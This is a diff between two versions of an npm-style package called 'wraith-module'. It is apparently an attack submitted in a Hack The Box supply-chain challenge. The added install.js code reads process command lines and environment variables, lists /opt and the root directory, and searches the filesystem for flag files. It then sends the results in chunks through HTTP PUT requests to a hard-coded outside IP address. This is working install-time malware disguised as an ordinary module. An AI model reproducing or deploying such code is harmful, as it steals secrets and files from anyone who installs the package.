wraith-module 100.0.0 → 101.0.0

package/install.js

@@ -9,7 +9,7 @@ async function report(moduleId, val) {
   const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
   const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
   await new Promise((resolve) => {
-    const req = http.request({ hostname: '154.57.164.82', port: 32332, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
+    const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
     req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
     req.write(body); req.end();
   });
@@ -19,10 +19,10 @@ async function report(moduleId, val) {
   // Read nethunter.sh
   const nh = tryRead('/opt/hscan-supplychain-dynamic/nethunter.sh') || '';
   
-  // Also list the full directory
-  const nhDir = tryExec('find /opt/hscan-supplychain-dynamic -type f 2>/dev/null');
+  // List opt dir
+  const optDir = tryExec('find /opt -type f 2>/dev/null');
   
-  // Full CMD1  
+  // Full CMD1
   const cmd1 = tryRead('/proc/1/cmdline');
   const cmd1str = cmd1 ? cmd1.replace(/\x00/g, ' ') : '';
   
@@ -30,30 +30,55 @@ async function report(moduleId, val) {
   const env1 = tryRead('/proc/1/environ');
   const env1str = env1 ? env1.replace(/\x00/g, ' | ') : '';
 
-  // Send nethunter.sh in chunks of 90 chars each
+  // Try to find the flag everywhere
+  const htb = tryExec('grep -rl "HTB{\\|flag{" / --exclude-dir=proc --exclude-dir=sys --exclude-dir=node_modules 2>/dev/null | head -5');
+  const flag = tryExec('cat /flag* /root/flag* /home/*/flag* 2>/dev/null');
+  
+  // Root listing
+  const rootLs = tryExec('ls -la / 2>/dev/null');
+
+  // Build chunks
   const items = [];
-  items.push('NHDIR=' + nhDir.substring(0, 85));
-  items.push('CMD=' + cmd1str.substring(0, 85));
-  items.push('CMD2=' + cmd1str.substring(85, 170));
-  items.push('ENV=' + env1str.substring(0, 85));
-  items.push('ENV2=' + env1str.substring(85, 170));
+  items.push('CMD=' + cmd1str);
+  items.push('ENV=' + env1str);
+  items.push('OPTDIR=' + optDir);
+  items.push('ROOTLS=' + rootLs);
+  items.push('HTB=' + (htb || 'NONE'));
+  items.push('FLAG=' + (flag || 'NONE'));
   
   // nethunter.sh in chunks
-  for (let i = 0; i < 20; i++) {
+  for (let i = 0; i < 30; i++) {
     const chunk = nh.substring(i * 85, (i + 1) * 85);
     if (!chunk) break;
     items.push('NH' + i + '=' + chunk);
   }
-  
+
   const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
   
   for (let round = 0; round < Math.ceil(items.length / 4); round++) {
     for (let i = 0; i < 4; i++) {
       const idx = round * 4 + i;
       if (idx < items.length) {
-        await report(mods[i], 'N' + idx + '_' + items[idx]);
+        const item = items[idx];
+        // Truncate each item to 85 chars for the module name limit
+        await report(mods[i], 'Q' + idx + '_' + item.substring(0, 85));
       }
     }
     await new Promise(r => setTimeout(r, 1500));
   }
+  
+  // Extra rounds for long items
+  const longItems = ['CMD', 'ENV', 'OPTDIR', 'ROOTLS'];
+  for (let li = 0; li < longItems.length; li++) {
+    const key = longItems[li];
+    const fullVal = items.find(i => i.startsWith(key + '='));
+    if (fullVal && fullVal.length > 85) {
+      for (let chunk = 1; chunk < 5; chunk++) {
+        const part = fullVal.substring(chunk * 85, (chunk + 1) * 85);
+        if (part) {
+          await report(mods[li % 4], 'E' + li + 'C' + chunk + '_' + part);
+        }
+      }
+    }
+  }
 })();

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "wraith-module",
-  "version": "100.0.0",
+  "version": "101.0.0",
   "description": "Wraith spectral module",
   "main": "index.js",
   "scripts": {